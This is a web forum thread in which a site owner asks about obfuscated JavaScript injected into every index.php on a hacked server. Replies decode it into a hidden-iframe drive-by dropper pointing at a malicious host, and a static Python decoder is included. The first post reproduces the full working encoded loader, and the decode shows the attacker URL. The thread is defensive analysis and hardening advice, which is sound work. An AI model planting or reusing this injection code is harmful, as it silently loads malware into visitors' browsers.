index.php hacked

hi guys,

my server was attacked some days ago, and to all "index.php" files the following code was added:

[CODE]
<script>String.prototype.test="harC";for(i in $="")m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('a'+'s'))throw 1;}catch(q){h=-1*(d-d2);}
n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,39-h,121-h,7-h,7-h,7-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,57-h,7-h,7-h,123-h,30-h,99-h,106-h,113-h,99-h,30-h,121-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,117-h,112-h,103-h,114-h,99-h,38-h,32-h,58-h,103-h,100-h,112-h,95-h,107-h,99-h,30-h,113-h,112-h,97-h,59-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,30-h,117-h,103-h,98-h,114-h,102-h,59-h,37-h,47-h,46-h,37-h,30-h,102-h,99-h,103-h,101-h,102-h,114-h,59-h,37-h,47-h,46-h,37-h,30-h,113-h,114-h,119-h,106-h,99-h,59-h,37-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,56-h,102-h,103-h,98-h,98-h,99-h,108-h,57-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,56-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,57-h,106-h,99-h,100-h,114-h,56-h,46-h,57-h,114-h,109-h,110-h,56-h,46-h,57-h,37-h,60-h,58-h,45-h,103-h,100-h,112-h,95-h,107-h,99-h,60-h,32-h,39-h,57-h,7-h,7-h,123-h,7-h,7-h,100-h,115-h,108-h,97-h,114-h,103-h,109-h,108-h,30-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,121-h,7-h,7-h,7-h,116-h,95-h,112-h,30-h,100-h,30-h,59-h,30-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,97-h,112-h,99-h,95-h,114-h,99-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,38-h,37-h,103-h,100-h,112-h,95-h,107-h,99-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,113-h,112-h,97-h,37-h,42-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,39-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,116-h,103
-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,59-h,37-h,102-h,103-h,98-h,98-h,99-h,108-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,59-h,37-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,106-h,99-h,100-h,114-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,114-h,109-h,110-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,117-h,103-h,98-h,114-h,102-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);</script>
[/CODE]

Well, I think it's JavaScript, and now I want to know WHAT this code is / was doing a) on my server, b) in the browsers of my visitors.

thanks!

PS: as you might have realized, English is not my mother tongue...

JavaScript

14 Comments

@DracoMerest Aug 28, 2011 — decoded:

[CODE]
if (document.getElementsByTagName('body')[0])
{ iframer(); }
else
{ document.write("<iframe src='http://pouzvtnh.cz.cc/count16.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer()
{ var f = document.createElement('iframe');
f.setAttribute('src','http://pouzvtnh.cz.cc/count16.php');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
[/CODE]


edit: wow, Do Not load that pouzvtnh.cz.cc site. Will redirect you somewhere else

and even though I only downloaded the source in raw unexecutable text, AVG picked it up. So it's a known threat.
@go-seven (author) Aug 28, 2011 — do you have an idea how it came to my webspace? I'm only using Linux systems - no Windows!
@DracoMerest Aug 28, 2011 — Best guess: someone figured out your Linux password? I do not know how you access your server remotely, but obviously someone does.

Hacking is a tricky thing - sometimes the easiest method is the least obvious.

If you have a simple password and I can sniff out your password hash database (I don't know what it is called really) and extract the MD5 hash or whichever, I could either brute-force your password or use a rainbow table.
@go-seven (author) Aug 28, 2011 — okay, I've changed all my passwords now - hopefully I won't forget them... (by the way, I used a live disk that could not be infected by a rootkit, I think).

I'm going to contact my hoster too. hopefully he might help me...

okay, thanks for your great help, now I know what my problem is.
@DracoMerest Aug 29, 2011 — Passwords may not have been your only problem area.

You have not indicated what is on your site.

If you allow visitors to post information through a shoutbox or mini forum, then there is always the possibility that someone was able to bypass any active content filters and inject some malicious code which actively modified the files on your server.

Having changed one security aspect, your password, wait. If it happens again, look for a solution elsewhere. Always make one change and test the result.
@Dorky Aug 30, 2011 — all page data should come through the index, and the top of each file should be conditioned on being accessed by the index: }else{ exit; } or kill;

the index should never be writable (perm 0555), and SQL is the worst idea for passwords. flatfile above the web-root instead.

after all, SQL is simply a flatfile organizer.
@criterion9 Aug 30, 2011 — [QUOTE]all page data should come through the index, and the top of each file should be conditioned on being accessed by the index: }else{ exit; } or kill;

the index should never be writable (perm 0555), and SQL is the worst idea for passwords. flatfile above the web-root instead.

after all, SQL is simply a flatfile organizer.[/QUOTE]

SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host, it might've been another poor consumer who was initially hacked, in which case there really might not have been anything the OP could have done.
@Dorky Aug 30, 2011 — [QUOTE]SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host, it might've been another poor consumer who was initially hacked, in which case there really might not have been anything the OP could have done.[/QUOTE]

Word
@drotha2 Oct 06, 2011 — Hi,

DracoMerest, would you know where I could decode this kind of code, or what that code is? It is not base64; is there a site that encodes/decodes it, or some script that allows me to do this kind of coding?

Sorry for my bad English

Thanks a lot.
@DracoMerest Oct 06, 2011 — Hi Drotha,

Your English is not that bad but your description of what you want is terrible.

The only thing I can really identify from your request is base64 and de/encode.

Do you have MIME64 text you wish to decode?

http://www.webutils.pl/Base64

This type of text is usually found as a BIN attachment for newsgroups.

Are you referring to MD5 or NT/LM hashcodes?

RunScanner is very good.

RaibowTables.com will get many jobs done.

That is all I can offer at the moment due to not fully understanding your question.
@dalecosp Oct 06, 2011 — Most of these attacks (in the wild) are SQL injections. Always sanitize your inputs. If you're running someone else's code, upgrade to the latest version. And complain to them rather loudly.
@drotha2 Oct 06, 2011 — Hi DracoMerest,

I wish I could de/encode this type of code:

7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,... from the first post, which you decoded. It is not base64 encoded, is it? How do I de/encode it?

Thanks a lot
@DracoMerest Oct 08, 2011 — Hi Drotha,

I do not have an encoder.

The decoder is in the script posted by go-seven. I merely asked the decoder to show the result instead of executing it.

[CODE]
for(i=0;i<n.length;i++)
  ss+=s(eval("n"+"["+"i"+"]"));
// eval(ss);
document.write("<xmp>"+ss+"</xmp>");
[/CODE]

Search Google for 'encrypt JavaScript' and you'll find many results, but most of them are useless because the decode script must be included within any webpage that uses the encryption.

Did you read the Sticky Note "Wondering how to hide your source code?"

Note: I am very sad to see the <XMP> tag not being part of HTML5...
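A static decoder for the loader's "K-h" array scheme, added here as an example and not code from this thread. Instead of letting the script compute `h` in a browser (the `valueOf()-2` Date trick DracoMerest's decode relied on), it reads that constant from the source, rebuilds the string that would have reached `eval(ss)`, and gives a cheap fingerprint for scanning other index.php files. The sample input is constructed from the page's own prologue with the array cut to its first 14 terms.

```python
"""Static decoder for the n=[K-h,...] JavaScript loader quoted in this thread."""
import re

# One term of the obfuscated array: an integer literal followed by "-h".
TERM_RE = re.compile(r"(\d+)-h")
ARRAY_RE = re.compile(r"n=\[((?:\d+-h,?)+)\]")
# The loader derives h from a Date difference in its catch block:
#   d2 = new Date(d.valueOf()-2);  h = -1*(d-d2)   ->   h = -2
OFFSET_RE = re.compile(r"valueOf\(\)\s*-\s*(\d+)")


def recover_offset(script: str) -> int:
    """Recover h without executing anything: h = -(constant subtracted from d)."""
    m = OFFSET_RE.search(script)
    if m is None:
        raise ValueError("Date-offset trick not found; not this loader variant")
    return -int(m.group(1))


def decode_payload(script: str) -> str:
    """Rebuild the string the loader would have passed to eval(ss)."""
    h = recover_offset(script)
    m = ARRAY_RE.search(script)
    if m is None:
        raise ValueError("n=[...] array not found")
    # String.fromCharCode(n[i]) with n[i] = K - h, done with chr() instead of eval.
    return "".join(chr(int(k) - h) for k in TERM_RE.findall(m.group(1)))


def looks_like_loader(script: str) -> bool:
    """Fingerprint for scanning files: split-string fromCharCode plus the K-h array."""
    return '"fr"+"omC"' in script and ARRAY_RE.search(script) is not None


# Constructed sample: the page's prologue, array truncated to the first 14 terms
# (which decode to the page's own "\t\tif (document" prefix).
SAMPLE = (
    '<script>String.prototype.test="harC";for(i in $="")m=$[i];var ss="";'
    "try{eval('asdas')}catch(q){s=String[\"fr\"+\"omC\"+m+\"od\"+'e'];}"
    "d=new Date();d2=new Date(d.valueOf()-2);"
    "n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h];"
    'for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);</script>'
)

if __name__ == "__main__":
    print(repr(decode_payload(SAMPLE)))  # '\t\tif (document'
```

Run it over the full script from the first post (or any index.php on the box) and the output is the decoded iframe dropper DracoMerest posted; nothing from the file is ever executed.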
@TSNet Jan 22, 2013 — [QUOTE]Passwords may not have been your only problem area.

You have not indicated what is on your site.

If you allow visitors to post information through a shoutbox or mini forum, then there is always the possibility that someone was able to bypass any active content filters and inject some malicious code which actively modified the files on your server.

Having changed one security aspect, your password, wait. If it happens again, look for a solution elsewhere. Always make one change and test the result.[/QUOTE]

I was planning to add a shoutbox to my site, and seeing this post, I'm now pondering if it is safe to add the shoutbox.